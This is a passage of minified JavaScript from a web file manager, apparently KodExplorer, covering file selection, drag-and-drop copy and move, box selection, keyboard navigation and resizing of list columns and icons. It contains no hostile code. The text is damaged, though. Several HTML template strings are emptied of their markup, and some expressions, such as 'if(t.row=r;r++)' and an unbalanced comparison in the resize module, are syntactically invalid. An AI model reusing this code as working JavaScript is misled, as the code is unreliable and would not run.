i=trim($(this).text());a!=e.length-1?t.favRemove(i,"",!0):t.favRemove(i,function(e){Tips.tips(e),ui.tree.refreshFav()},!0)})},clipboard:function(){a.clipboard()},copy:function(){o()&&a.copy(b(!0))},cute:function(){o()&&a.cute(b(!0),ui.f5)},cuteDrag:function(e){a.cuteDrag(b(!0),e,v)},copyDrag:function(e,t){a.copyDrag(b(!0),e,v,t)},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){a.copyDrag(b(!0),e,v,!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){a.cuteDrag(b(!0),e,v)})},past:function(){var e=G.thisPath;"split"==G.userConfig.listType&&($containBox=$(".split-box.split-select"),1==$containBox.length&&(e=ui.fileLight.path($containBox))),a.past(e,v)},info:function(){t.info(b(!0))},newFile:function(e){void 0==e&&(e="txt"),h("file",u("newfile",e),e)},newFolder:function(){h("folder",u(LNG.newfolder),"")},shareFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+urlEncode(b().path);window.open(e)},rname:m,list:s,setSearchByStr:d,setSelectByChar:c,setSelectByFilename:l}}),define("app/path/tpl/file/create.html",[],"
      \n {{if listType=='list'}}{{/if}}\n
      \n \n {{if type=='folder'}}\n
      {{\"folder\" | core.icon}}
      \n {{else}}\n
      {{ext | core.icon}}
      \n {{/if}}\n
      \n {{if listType=='icon'}}\n \n {{else}}\n \n {{/if}}\n
      \n
      \n
      \n
      \n
      \n"),define("app/src/explorer/fileLight",[],function(){var e=$(),t=$(),a=function(){var e;e="split"!=G.userConfig.listType?$(".bodymain .file-continer .file"):$(".bodymain .file-continer .split-select .file"),t=e,f("clear"),Hook.trigger("explorer.fileSelect.init",this)},i=function(){var t=$(Config.SelectClass);e=t,t.length>1&&c(t),f("menu-file"),Hook.trigger("explorer.fileSelect.change",this)},n=function(){if(G.jsonData&&G.jsonData.fileList){var e=G.jsonData.fileList.length+G.jsonData.folderList.length;$(".file-select-info .item-num").html(e+LNG.folder_info_item)}},o=function(){var t="",a=0,i=e;0!=i.length&&(t=i.length+LNG.folder_info_item_select,i.each(function(){a+=parseInt($(this).attr("data-size"))}),0!=a&&(t=t+" ("+pathTools.fileSize(a)+")")),$(".file-select-info .item-select").html(t)},s=function(t){var a=e;if(void 0==t&&a&&a.length>=1&&(t=$(a[a.length-1])),void 0!=t&&!t.inScreen()){var i=$(".bodymain");"split"==G.userConfig.listType&&(i=t.parent());var n=t.offset().top-i.offset().top-i.height()/2+i.scrollTop();i.stop(!0).animate({scrollTop:n},100)}},r=function(e){return core.pathThis(h(e))},l=function(e){return e.find(".ico").attr("filetype")},c=function(e){if(G.jsonData.info)switch(G.jsonData.info.pathType){case G.KOD_USER_RECYCLE:return;case G.KOD_USER_FAV:return e.removeClass("menu-fav-path").addClass("menu-fav-path-more"),void 0;case G.KOD_USER_SHARE:if(-1==trim(G.thisPath,"/").search("/"))return e.removeClass("menu-share-path").addClass("menu-share-path-more"),void 0;case G.KOD_GROUP_ROOT_SELF:case G.KOD_GROUP_ROOT_ALL:return e.removeClass("menu-group-root").addClass("menu-group-root-more"),void 0;default:}e.removeClass("menu-file menu-folder").addClass("menu-more"),f()},d=function(e){var t={"file-box":"menu-file","folder-box":"menu-folder","menu-recycle-path":"menu-recycle-path","menu-share-path-more":"menu-share-path","menu-fav-path-more":"menu-fav-path","menu-group-root-more":"menu-group-root","menu-default":"menu-default"};e.removeClass("menu-more");for(var a in t)e.hasClass(a)&&e.addClass(t[a]);f()},p=function(){var t=[];if(0!=e.length)return e.each(function(){t.push(h($(this)))}),t},u=function(){if(0!=e.length){var t=e;t.removeClass(Config.SelectClassName),t.each(function(){d($(this))}),e=$(),f(),Hook.trigger("explorer.fileSelect.change",this)}},f=function(){0==e.length?($(".drop-menu-action li").addClass("disabled"),$(".drop-menu-action #past").removeClass("disabled"),$(".drop-menu-action #info").removeClass("disabled")):$(".drop-menu-action li").removeClass("disabled")},h=function(e,t){return void 0==t&&(t="data-path"),void 0!=e.attr("data-path-children")&&(t="data-path-children"),pathHashDecode(e.attr(t))};return{init:a,name:r,path:h,type:l,fileListSelect:function(t){return t&&(e=t),e},fileListAll:function(e){return e&&(t=e),t},select:i,setInView:s,listNumberSet:n,selectNumSet:o,setMenu:c,resumeMenu:d,getAllName:p,clear:u,menuAction:f}}),define("app/src/explorer/fileSelect",[],function(){var e=!1,t=!1,a=!1,i=function(){$(Config.FileBoxClass).die("touchstart").live("touchstart",function(){$(this).hasClass("select")?ui.path.open():(ui.fileLight.clear(),$(this).removeClass("select"),$(this).addClass("select"),ui.fileLight.select())});var i=function(e){!e.hasClass(Config.TypeFolderClass)&&!e.hasClass("menu-recycle-button")||e.hasClass(Config.SelectClassName)||($(".file-select-drag-temp").removeClass("file-select-drag-temp"),e.addClass("file-select-drag-temp"))},l=function(){};$(Config.FileBoxClass).die("mouseenter").live("mouseenter",function(){t&&i($(this)),e||t||$(this).addClass(Config.HoverClassName),l($(this)),$(this).unbind("mousedown").bind("mousedown",function(e){if($(e.target).is("input")||$(e.target).is("textarea"))return!0;if($(this).focus(),$.contextMenu.hidden(),$(e.target).parents(".children-more").exists())return ui.fileContent.pathChildrenTree($(this)),stopPP(e),!1;if($(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu"))return $(this).hasClass(Config.SelectClassName)?void 0:(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),!0);if(!$(e.target).hasClass("item-select")&&!$(e.target).parent().hasClass("item-select")){if(!(e.ctrlKey||e.metaKey||e.shiftKey||$(this).hasClass(Config.SelectClassName)))return ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),!0;if(3!=e.which||$(this).hasClass(Config.SelectClassName)||(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select()),(e.ctrlKey||e.metaKey)&&($(this).hasClass(Config.SelectClassName)?a=!0:(ui.fileLight.setMenu($(this)),$(this).addClass(Config.SelectClassName)),ui.fileLight.select()),e.shiftKey){var t=m.fileListAll($(this)),i=m.fileListSelect($(this)),n=t.index($(this));if(0==i.length)w(0,n,t);else{var o=t.index(i.first()),s=t.index(i.last());o>n?w(n,s,t):n>s?w(o,n,t):w(o,n,t)}}return!0}}).unbind("mouseup").bind("mouseup",function(){return $(".file-select-drag-temp").removeClass("file-select-drag-temp"),!0})}).die("mouseleave").live("mouseleave",function(){$(this).removeClass(Config.HoverClassName),t&&$(this).removeClass("file-select-drag-temp")}).die("click").live("click",function(e){if(stopPP(e),t)return!1;if($(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu")){var i=$(this).find(".item-menu");return $(this).contextMenu({x:i.offset().left+i.width(),y:i.offset().top}),void 0}return $(e.target).hasClass("item-select")||$(e.target).parent().hasClass("item-select")?($(this).toggleClass(Config.SelectClassName),ui.fileLight.select(),void 0):(0==$(this).find(".textarea").length&&0==$(".file-draging-box").length&&(e.ctrlKey||e.metaKey||e.shiftKey?(e.ctrlKey||e.metaKey)&&a&&(a=!1,ui.fileLight.resumeMenu($(this)),$(this).removeClass(Config.SelectClassName),ui.fileLight.select()):(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),r($(this)))),void 0)}).die("dblclick").live("dblclick",function(e){if(!($(e.target).is("textarea")||$(e.target).is("input")||$(e.target).hasClass("children-more")||$(e.target).hasClass("children-more-cert")||$(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu")||$(e.target).hasClass("item-select")||$(e.target).parent().hasClass("item-select")))if(e.altKey)ui.path.info();else{if(1!=ui.fileLight.fileListSelect().length)return;if("split"==G.userConfig.listType&&s($(this))){var t=ui.fileLight.path($(this));return G.thisPath="",$(".file-list-split .split-box").remove(),ui.path.list(t),void 0}ui.path.open()}}),n(),o(),$(Config.FileBoxTittleClass).die("dblclick").live("dblclick",function(e){if(!$(this).hasClass("db-click-rename"))return!0;if(!($(this).find(".textarea").length>0)){var t=$(this).parents(".file");return t.hasClass("systemBox"),ui.path.rname(),stopPP(e),!1}})},n=function(){var e;$("#folder-list-tree a").die("mouseenter").live("mouseenter",function(){if(t){($(this).hasClass("menu-tree-folder")||$(this).hasClass("menu-tree-folder-fav"))&&$(this).addClass("curDropTreeNode"),clearTimeout(e),e=!1;var a=ui.tree.zTree(),i=a.getNodeByTId($(this).parent().attr("id"));!i.open&&i.isParent&&(e=setTimeout(function(){a.expandNode(i,!0)},600))}}).die("mouseup").live("mouseup",function(){if(t){$(this).removeClass("curDropTreeNode"),clearTimeout(e),e=!1;var a=ui.tree.zTree(),i=a.getNodeByTId($(this).parent().attr("id"));setTimeout(function(){i.isParent=!0,a.reAsyncChildNodes(i,"refresh")},100)}}).die("mouseleave").live("mouseleave",function(){t&&($(this).removeClass("curDropTreeNode"),clearTimeout(e),e=!1)})},o=function(){$(".header-middle .yarnlet a").die("mouseenter").live("mouseenter",function(){t&&$(this).addClass("curDropToPath")}).die("mouseup").live("mouseup",function(){t&&$(this).removeClass("curDropToPath")}).die("mouseleave").live("mouseleave",function(){t&&$(this).removeClass("curDropToPath")})},s=function(e){return"icon"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")?!0:!1:"list"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")||0!=e.find(".children-more-cert").length?!0:!1:"split"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")||0!=e.find(".children-more-cert").length?!0:!1:void 0},r=function(e){if("split"==G.userConfig.listType&&s(e)&&1==ui.fileLight.fileListSelect().length){var t=ui.fileLight.path(e);ui.path.history.add(t),ui.fileContent.pathChildrenSplit(t,function(){c(t)})}},l=function(){var e=".file-list-split .split-box",t="split-hover";$(e).live("mouseenter",function(){$(e).removeClass(t),$(this).addClass(t)}).die("mouseleave").live("mouseleave",function(){$(this).removeClass(t)}).die("click").live("click",function(){c(ui.fileLight.path($(this)))}).die("mousedown").live("mousedown",function(e){var t=$(e.target).parents(".file"); (0==t.length||0==t.find(".children-open").length)&&c(ui.fileLight.path($(this)))})},c=function(e){var t=$(".file-list-split .split-box"),a=$('.file-list-split .split-box[data-path="'+pathHashEncode(e)+'"]'),i=$('.file-list-split .split-box .file[data-path="'+pathHashEncode(e)+'"]'),n="split-select";0==a.length&&(a=t.last()),t.removeClass(n),a.addClass(n),0==ui.fileLight.fileListSelect().length&&i.addClass("select"),ui.fileLight.select();var o=a.data("jsonData");o&&e&&(ui.fileContent.pathTypeChange(o),G.thisPath=e,G.jsonData=o,ui.headerAddress.addressSet()),ui.fileLight.init()},d=function(e){return e.hasClass("menuSharePath")||e.hasClass("systemBox")?!1:!0},p=function(e){$("body").removeClass("cursor-mouse cursor-warning cursor-move cursor-down cursor-add"),e&&$("body").addClass("cursor-mouse cursor-"+e)},u=function(){var a,i,n,o=150,s=!1,r=!1,l=0,c=!1,u=-15,f=10,h=0,m=0,v="selectDragDraging";$(Config.FileBoxClass).die("mousedown").live("mousedown",function(t){if(!t.shiftKey){if(ui.isEdit())return!0;if(1!=t.which||e)return!0;a=$(this),d(a)&&(y(t),$.browser.mozilla||this.setCapture&&this.setCapture(),$(document).mousemove(function(e){k(e)}),$(document).keydown(function(e){k(e)}),$(document).keyup(function(e){k(e)}),$(document).one("mouseup",function(e){_(e),this.releaseCapture&&this.releaseCapture()}))}});var g,b,y=function(e){$.contextMenu.hidden(),t=!0,l=$.now(),h=e.pageY,m=e.pageX,i=$(document).height(),n=$(document).width(),r=$(e.target).parents(".file")},k=function(e){if(!t)return!0;if(window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),$.now()-l>o&&!c&&(L(),s=$(".draggable-dragging"),s.attr("data-beforeInfo",s.find("span").html())),c){var a=e.clientX>=n-50?n-50:e.clientX,r=e.clientY>=i-50?i-50:e.clientY;return a=0>=a?0:a,r=0>=r?0:r,a-=u,r-=f,s.css({left:a,top:r}),x(e),E(a-m+u,r-h+f),!0}},x=function(e){clearTimeout(g),g=!1,g=setTimeout(function(){try{w(e)}catch(t){}},10)},w=function(e){var t=e.ctrlKey||e.metaKey,a=function(e,t){G.sid!==void 0&&(e="none"),void 0!=t&&0!==t.search(G.KOD_GROUP_PATH)&&0!==t.search(G.KOD_USER_RECYCLE)&&core.isSystemPath(t)&&(e="clear");var a=htmlEncode(core.pathThis(t)),i=" "+s.attr("data-beforeInfo").replace(/<[^<>]+>/g,""),n={copyTo:''+LNG.copy_to+'"'+a+'"',moveTo:''+LNG.cute_to+'"'+a+'"',remove:''+LNG.remove+i+"",share:''+LNG.share+i+"",none:''+LNG.no_permission_write+"",clear:s.attr("data-beforeInfo")};t==G.thisPath&&(n.copyTo=''+LNG.clone+""),s.find("span").html(n[e]),s.attr("data-actionType",e),s.attr("data-actionPath",t);var n={copyTo:"add",moveTo:"move",remove:"move",share:"add",none:"default",clear:"default"};p(n[e])};if(t||0!=$(".file-select-drag-temp").length||0!=$(".curDropTreeNode").length||0!=$(".curDropToPath").length){var i=ui.fileLight.path($(".file-select-drag-temp"));if(0!=$(".curDropTreeNode").length){var n=ui.tree.zTree(),o=n.getNodeByTId($(".curDropTreeNode").parent().attr("id"));i=o.path}0!=$(".curDropToPath").length&&(i=$(".curDropToPath").attr("data-path")),i||(i=G.thisPath),$(".file-select-drag-temp").hasClass("menu-recycle-button")?a("remove"):t?a("copyTo",i):a("moveTo",i)}else if(0!=$(".recycle-hover").length)a("remove");else if(0!=$(".share-hover").length&&1>=ui.fileLight.fileListSelect().length)a("share");else{var i=G.thisPath;"split"==G.userConfig.listType&&$(".split-hover").length>0?(i=ui.fileLight.path($(".split-hover")),t?a("copyTo",i):$(".split-hover").hasClass("split-select")?a("clear"):a("moveTo",i)):a("clear")}},_=function(){if(!t)return!1;if(clearTimeout(g),t=!1,c=!1,$("body").removeClass(v),s){s.addClass("animated-300").addClass("flipOutXLine").fadeOut(200,function(){s.remove(),s=!1});var e=function(e,t){switch(e){case"copyTo":ui.path.copyDrag(t,!0);break;case"moveTo":ui.path.cuteDrag(t);break;case"remove":ui.path.remove(!0);break;case"share":ui.path.share();break;default:}},a=s.attr("data-actionType");-1!=$.inArray(a,["copyTo","moveTo","remove","share"])?A(!1):A(!0),e(a,s.attr("data-actionPath")),p(!1)}},L=function(){$("body").addClass(v);var e=ui.fileLight.fileListSelect().length;$('
      '+e+'
      '+e+" "+LNG.file+"
      ").appendTo("body"),c=!0,setTimeout(j,20)},N=0,C=5,T=35,S=20,D=50,j=function(){clearTimeout($(".file-draging-box").data("removeDelay")),$(".file-draging .file").stop(),$(".file-draging-box").remove();var e={icon:"file-list-icon",list:"file-list-list",split:"file-list-split"},t=e[G.userConfig.listType];$("
      ").appendTo("body"),b=$(Config.SelectClass).filter("[data-path!='']");var a=b.clone();(b.length>=D||$.browser.msie)&&(a=r.clone()),a.appendTo(".file-draging"),a.each(function(e){var t=$(".bodymain .file-continer .file[data-path='"+$(this).attr("data-path")+"']"),i=t.offset();$(this).css({left:i.left,top:i.top,width:t.width()}),$(this).data({"data-left":i.left,"data-top":i.top,"data-animateTime":200+e*C,"data-sizeAdd":N*e}),$(this).attr("data-path")==r.attr("data-path")&&$(this).addClass("handle_target"),1==a.length&&($(this).data({"data-animateTime":0}),S=0)}),b.addClass("item-file-draging");var i=setTimeout(function(){$(".file-draging-box").data("animate","finished");var e=$(".draggable-dragging");a.each(function(){var t=$(this),a=$(this).data("data-sizeAdd"),i=$(this).data("data-animateTime");$(this).data("status","ready"),$(this).animate({opacity:1},{duration:i,easing:"swing",progress:function(i,n){var o=t.offset(),s=e.offset(),r=(s.left+a-o.left)*n,l=(s.top+a+T-o.top)*n;t.css({left:o.left+r,top:o.top+l})},complete:function(){t.data("status","finished")}})})},S);$(".file-draging-box").data("dragDelay",i),$(".file-draging-box").data("animate","ready")},E=function(e,t){return"finished"!=$(".file-draging-box").data("animate")?($(".file-draging .file").each(function(){$(this).css({left:$(this).data("data-left")+e,top:$(this).data("data-top")+t})}),void 0):($(".file-draging .file").each(function(){if("finished"==$(this).data("status")){var e=$(this).data("data-sizeAdd"),t=$(".draggable-dragging").offset();$(this).css({left:t.left+e,top:t.top+e+T})}}),void 0)},A=function(e){var t=$(".file-draging .file").length;clearTimeout($(".file-draging-box").data("dragDelay")),$(".file-draging .file").each(function(t){var a=t*C,i=$(".bodymain .file-continer .file[data-path='"+$(this).attr("data-path")+"']");e?$(this).stop().animate({left:$(this).data("data-left"),top:$(this).data("data-top")},250+a,function(){b.removeClass("item-file-draging")}).animate({opacity:0},150,function(){$(this).remove()}):(i.stop().animate({opacity:1},100),$(this).stop().animate({opacity:0},200+a,function(){$(this).remove()}))});var a=setTimeout(function(){$(".file-draging-box").remove()},400+C*t);$(".file-draging-box").data("removeDelay",a)}},f=function(){var a=null,i=null,n=null,o=0,s=0,r=0,l=0,c="",d="bodymain";core.isApp("desktop")&&(d="file-continer");var p=$("."+d);p.die("mousedown").live("mousedown",function(e){if(!($(e.target).hasClass(d)&&20>$(document).width()-e.pageX)){if(r=$(".file-continer").outerHeight(),l=p.outerHeight(),ui.isEdit())return!0;if(1!=e.which||t)return!0;u(e),this.setCapture&&this.setCapture(),$(document).unbind("mousemove").mousemove(function(e){f(e)}),$(document).one("mouseup",function(e){clearTimeout(c),c=!1,v(e),this.releaseCapture&&this.releaseCapture()})}});var u=function(t){s=p.offset().left-p.scrollLeft(),o=p.offset().top-p.scrollTop(),"split"==G.userConfig.listType&&(o+=$(t.target).parents(".split-box").scrollTop()),$(t.target).parent().hasClass(Config.FileBoxClassName)||$(t.target).parent().parent().hasClass(Config.FileBoxClassName)||$(t.target).hasClass("fix")||($.contextMenu.hidden(),t.ctrlKey||t.metaKey||t.shiftKey||ui.fileLight.clear(),$(t.target).hasClass("ico")||(a=t.pageX-s,i=t.pageY-o,c=setTimeout(function(){e=!0,0==$(".select-container").length&&$('
      ').appendTo(Config.FileBoxSelector),n=$(".select-container")},100)))},f=function(t){if(!e)return!0;var o=t.pageX-p.offset().left+p.scrollLeft(),s=t.pageY-p.offset().top+p.scrollTop(),c=Math.abs(o-a),d=Math.abs(s-i);s>i&&d>r-i&&r>l&&(d=r-i),h(s,i,d,p),n.css({left:Math.min(o,a)+2,top:Math.min(s,i)+2,width:c,height:d}),1e3>ui.fileLight.fileListAll().length&&m()},h=function(e,t,a,i){var n=i.outerHeight(),o=i.scrollTop(),s=o;if(e>t){var r=t+a,l=n+o,c=r-l;c>0?s+=c:-n>c&&(s+=n-Math.abs(c))}else if(t>e){var d=t-a,p=o,c=d-p;0>c?s+=c:c>n&&(s+=Math.abs(c)-n)}s!==o&&i.stop(!0,!1).animate({scrollTop:s},100)},m=function(){for(var e=n.offset().left-p.offset().left+p.scrollLeft(),t=n.offset().top-p.offset().top+p.scrollTop(),a=e+n.width(),i=t+n.height(),o=ui.fileLight.fileListAll(),s=0;o.length>s;s++){var r=o[s],l=$(o[s]),c=l.parent().scrollTop(),d=r.offsetLeft,u=r.offsetTop-c,f=d+l.width(),h=u+l.height();if("split"==G.userConfig.listType&&(d+=l.parents(".split-box")[0].offsetLeft,f=d+l.width()),a-e+f-d>Math.abs(e+a-(d+f))&&i-t+h-u>Math.abs(t+i-(u+h))){if(!l.hasClass("file-select-drag-temp")){if(l.hasClass("selectToggleClass"))continue;if(l.hasClass(Config.SelectClassName)){l.removeClass(Config.SelectClassName).addClass("selectToggleClass"),ui.fileLight.resumeMenu(l);continue}l.addClass("file-select-drag-temp")}}else l.removeClass("file-select-drag-temp"),l.hasClass("selectToggleClass")&&l.addClass(Config.SelectClassName).removeClass("selectToggleClass")}},v=function(){return e?(m(),n.remove(),$(".file-select-drag-temp").addClass(Config.SelectClassName).removeClass("file-select-drag-temp"),$(".selectToggleClass").removeClass("selectToggleClass"),ui.fileLight.select(),e=!1,a=null,i=null,void 0):!1}},h=function(e,t){var a=$(".file-list-split .split-box.split-select");if(e)a=e.parents(".split-box");else if(0!=ui.fileLight.fileListSelect().length){var i=ui.fileLight.fileListSelect().last();a=i.parents(".split-box")}return a.find(t)},m={fileListAll:function(e){return"split"!=G.userConfig.listType?ui.fileLight.fileListAll():h(e,".file")},fileListSelect:function(e){return"split"!=G.userConfig.listType?ui.fileLight.fileListSelect():h(e,".file.select")}},v=function(e){var t=m.fileListAll(),a=m.fileListSelect(),i=t.length-1,n=0,o=ui.getColfileNumberDesktop(),s=t.index(a.first()),r=t.index(a.last());switch(e){case"pageup":case"up":n=0>=s||0==s%o?s:s-1;break;case"left":n=0>=s-o?0:s-o;break;case"pagedown":case"down":n=r>=i||0==(r+1)%o?r:r+1;break;case"right":n=r+o>=i?i:r+o;break;default:}return t.eq(n)},g=function(e){if(core.isApp("desktop"))return v(e);var t=m.fileListAll(),a=m.fileListSelect(),i=t.length-1,n=0,o=ui.getRowfileNumber(),s=ui.getPagefileNumber(),r=t.index(a.first()),l=t.index(a.last());switch(e){case"up":n=0>=r-o?0:r-o,n=b(n,!1);break;case"left":n=0>=r?0:r-1;break;case"down":n=l+o>=i?i:l+o,n=b(n,!0);break;case"right":n=l>=i?l:l+1;break;case"pageup":n=0>=r-s?0:r-s,n=b(n,!1);break;case"pagedown":n=l+s>=i?i:l+s,n=b(n,!0);break;default:}return t.eq(n)},b=function(e,t){for(var a=m.fileListAll(),i=a.eq(e),n=a.length;0!=i.parents(".hidden").length;){if(t?e++:e--,0>=e||e>=n)return e;i=a.eq(e)}return e},y=function(e){var t,a=m.fileListAll(),i=m.fileListSelect(),n="",o=!1;switch(e.indexOf("shift+")>=0&&(o=!0,e=e.replace("shift+","")),e){case"home":n=i.last(),t=a.first();break;case"end":n=i.first(),t=a.last();break;case"left":n=i.last(),t=g(e);break;case"up":n=i.last(),t=g(e);break;case"right":n=i.first(),t=g(e);break;case"down":n=i.first(),t=g(e);break;case"pageup":n=i.last(),t=g(e);break;case"pagedown":n=i.first(),t=g(e);break;case"all":t=a;break;default:}if(!x(e)){if(o&&""!=n){var s=a.index(n),r=a.index(t);if(s>r){var l=s;s=r,r=l}return w(s,r,a),void 0}k(t)}},k=function(e){0!=e.length&&(ui.fileLight.clear(),e.addClass(Config.SelectClassName),ui.fileLight.select(),ui.fileLight.setInView(),"split"==G.userConfig.listType&&1==e.length&&r($(ui.fileLight.fileListSelect()[0])))},x=function(e){var t=$(ui.fileLight.fileListSelect()[0]);if("icon"==G.userConfig.listType)return!1;switch(e){case"left":if("list"==G.userConfig.listType)if(1==t.find(".children-more-cert.cert-open").length)t.find(".children-more-cert").removeClass("cert-open"),t.next().addClass("hidden");else{var a=t.parent(".children-list").prev(".file");k(a)}else if("split"==G.userConfig.listType){var a=t.parents(".split-box").prev().find(".select-split-parent");k(a)}break;case"right":if("list"==G.userConfig.listType)1==t.find(".children-more-cert").length&&(ui.fileContent.pathChildrenTree(t),t.find(".children-more-cert").addClass("cert-open"),t.next().removeClass("hidden"));else if("split"==G.userConfig.listType){var a=t.parents(".split-box").next().find(".file:eq(0)");k(a)}break;default:return!1}return!0},w=function(e,t,a){if(core.isApp("desktop"))return _(e,t,a);ui.fileLight.clear();for(var i=e;t>=i;i++)$(a[i]).addClass(Config.SelectClassName);ui.fileLight.select()},_=function(e,t,a){var i=ui.getColfileNumberDesktop(),n=Math.ceil(m.fileListAll().length/i),e={row:e%i,col:parseInt(e/i)},t={row:t%i,col:parseInt(t/i)};if(t.row=r;r++){var l=0,c=n;r==e.row&&(l=e.col),r==t.row&&(c=t.col);for(var d=l;c>=d;d++)s(r,d)}ui.fileLight.select()};return{init:function(){i(),l(),u(),f()},isDraging:function(){return t},selectSplit:c,selectPos:y}}),define("app/src/explorer/fileListResize",[],function(){var e={filename:250,filetype:80,filesize:80,filetime:150,explorerTreeWidth:199,editorTreeWidth:199},t={filename:150,filetype:60,filesize:60,filetime:120,explorerTreeWidth:2,editorTreeWidth:2},a=e,i=function(){if(LocalData.get("resizeConfig"))a=jsonDecode(LocalData.get("resizeConfig"));else{G.userConfig.resizeConfig!==void 0&&(a=jsonDecode(htmlDecode(G.userConfig.resizeConfig)));var i=jsonEncode(a);LocalData.set("resizeConfig",i)}$.each(e,function(i){(!a[i]||a[i]=a&&(a=t[e]),n+=a,i+=".file-list-list .file ."+e+",#main-title ."+e+"{width:"+a+"px;}")}),i+=".file-list-list .file{width:"+(n+50)+"px;}",$.setStyle(i,"header-resize-width")}},s=function(i,o,s){if(!$(".frame-left").is(":hidden")){var r=Config.pageApp+"TreeWidth",l=$.extend(!0,{},a);l[r]+=i,l[r]<=t[r]&&(l[r]=t[r]);var c=l[r],d=$(".frame-left"),p=$(".frame-resize"),u=$(".frame-right"),f=e[r];if(c>f-8&&f+8>c&&(c=f+1),s){var h=400;d.animate({width:c},h),p.animate({left:c-5},h),u.animate({left:c},h)}else d.css("width",c),p.css("left",c-5),u.css("left",c);ui.setStyle!==void 0&&ui.setStyle(),o&&(a=l,n())}},r=function(){return void 0!=$.getUrlParam("type")?!0:!1},l=function(e,i,s){var r=$.extend(!0,{},a);r[e]+=i,o(r),s&&(a=r,$.each(a,function(e,i){t[e]>=i&&(a[e]=t[e])}),n())},c=function(){$("#main-title").hasClass("bind-init")||(o(a),$("#main-title").addClass("bind-init"),$.each(e,function(e){$("#main-title ."+e+"-resize").drag({start:function(){},move:function(t){l(e,t,!1)},end:function(t){l(e,t,!0)}})}))},d=function(){var e=$(".frame-resize");e.drag({start:function(){e.addClass("active"),$(".resize-mask").css("display","block")},move:function(e){s(e,!1,!1)},end:function(t){s(t,!0,!1),e.removeClass("active"),$(".resize-mask").css("display","none")}})},p=function(){var e="fileIconSize";core.isApp("desktop")&&(e="fileIconSizeDesktop");var t=G.userConfig[e];t||(t="75"),h(t,!1),u(t)},u=function(e){$(".set-file-icon-size .file-icon-size").removeClass("selected");for(var t=[["40","box-size-smallx"],["60","box-size-small"],["80","box-size-default"],["100","box-size-big"],["120","box-size-bigx"]],a=10,i="",n=0;t.length>n;n++){var o=parseInt(t[n][0]);if(e>=o-a&&o+a>=e){i=t[n][1];break}}""!=i&&$("."+i).addClass("selected")},f=function(e){var t="fileIconSize";core.isApp("desktop")&&(t="fileIconSizeDesktop"),G.userConfig[t]=e,u(e),$.get(G.appHost+"setting/set&k="+t+"&v="+e)},h=function(e,t){var a=e,i=105,n=30,o=250;core.isApp("desktop")&&(n=40,o=150),a=n>=a?n:a,a=a>=o?o:a;var s=(e-n)*i/(o-n),r=20,l=10,c=parseInt(a),d=c+2*r-l+5,p=c-l,u=c-l,h=.4*c,m=c+3*r-l,v=".file-list-icon div.file,.file-list-icon .flex-empty{height:"+d+"px;width:"+c+"px;}";core.isApp("desktop")&&(d-=5,v="div.file-list-icon div.file,.file-list-icon .flex-empty{height:"+d+"px;width:"+c+"px;}"),$.browser.mozilla&&(u-=4);var g="div.file-list-icon div.file{max-height:"+m+"px;}"+v+" .file-list-icon .meta-info{height:"+h+"px;width:"+h+"px; margin-right:"+.16*h+"px;margin-top:-"+1.1*h+"px;} .file-list-icon div.file .filename{width:"+c+"px;} .file-list-icon div.file .filename #pathRenameTextarea, .file-list-icon div.file .filename .newfile{width:"+c+"px;} .file-list-icon div.file .ico{padding-left:"+l/2+"px;height:"+u+"px;width:"+p+"px} .file-list-icon div.file .ico.picture{width:"+p+"px;padding-left:"+l/2+"px;overflow:hidden;}";$.setStyle(g,"file_icon_resize"),$(".slider-handle").css("top",s),t&&f(e)},m=function(){var e,t=$(".slider-handle");$(".set-icon-size-slider").bind("click",function(e){return stopPP(e),!1});var a=function(t){var a=0,i=105,n=30,o=250,s=e+t;s=a>s?a:s,s=s>i?i:s;var r=parseInt(s/i*(o-n)+n);return h(r,!1),r};t.drag({start:function(){t.addClass("active"),e=parseInt(t.css("top"))},move:function(e,t){a(t)},end:function(e,i){t.removeClass("active"),f(a(i),!0)}});var i=$(".slider-bg");$(".slider-bg").unbind("click").bind("click",function(t){var n=t.clientY-i.offset().top;e=0,f(a(n),!0)})},v=function(){var e=function(e,t){var a=e.parent(),i=$(".split-box").index(a),n=parseInt(a.data("before_width"))+t;if(!(150>n)){$($(".split-line").get(i)).css("width",n),a.css("width",n),$(".split-box:gt("+i+")").each(function(){$(this).hasClass("is-drag-split")||$(this).css("left",parseInt($(this).data("before_left"))+t+"px")});var o=[];$(".split-box").each(function(){o.push({left:$(this).css("left"),width:$(this).width()})}),LocalData.set("splitBoxSize",jsonEncode(o))}};$(".bodymain .file-list-split .split-drag").drag({start:function(e,t){var a=t.parent();a.addClass("is-drag-split").data("before_width",a.width()),$(".split-box,.split-line").each(function(){$(this).data("before_left",$(this).css("left"))})},move:function(t,a,i,n){e(n,t)},end:function(e,t,a,i){i.parent().removeClass("is-drag-split")}},!0),$(".file.select-split-parent").removeClass("select-split-parent"),$(".split-box").each(function(){$('.file[data-path="'+$(this).attr("data-path")+'"]').addClass("select-split-parent")}),g()},g=function(){var e=jsonDecode(LocalData.get("splitBoxSize")),t=0;e||(e=[]);var a=function(a,i){var n=e[i];n||(n={width:250,left:t}),t+=n.width+1,a.css({width:n.width+"px",left:n.left})};t=0,$(".split-box").each(function(e){a($(this),e)}),t=0,$(".split-line").each(function(e){a($(this),e)}),$(".bodymain").scrollLeft(1e5)};return{init:function(){i(),r()&&(a=e),o(a),d(),s(0,!1,!0),m()},initFileSize:p,bindSplitResize:v,bindHeaderResize:c,setFileIconSize:h}}),define("app/src/explorer/headerAddress",[],function(){var e=function(){$("#yarnball li a").die("click").live("click",function(e){var t=$(this).attr("data-path");n(t),stopPP(e)}),$("#yarnball").die("click").live("click",function(){return $("#yarnball").css("display","none"),$("#yarnball-input").css("display","block"),$("#yarnball-input input").focus(),!0});var e=$("#yarnball-input 